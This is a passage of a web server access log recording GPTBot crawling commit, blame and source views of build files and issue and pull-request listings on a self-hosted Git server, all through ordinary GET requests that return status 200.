-[17/Feb/2026:18:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46767] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35739] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:18:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12516] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 10986] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" -[17/Feb/2026:18:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11106] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:18:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33691] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33388] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33697] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33390] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33683] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:18:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33682] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:18:41:07 +0000] - 200 200 - GET https 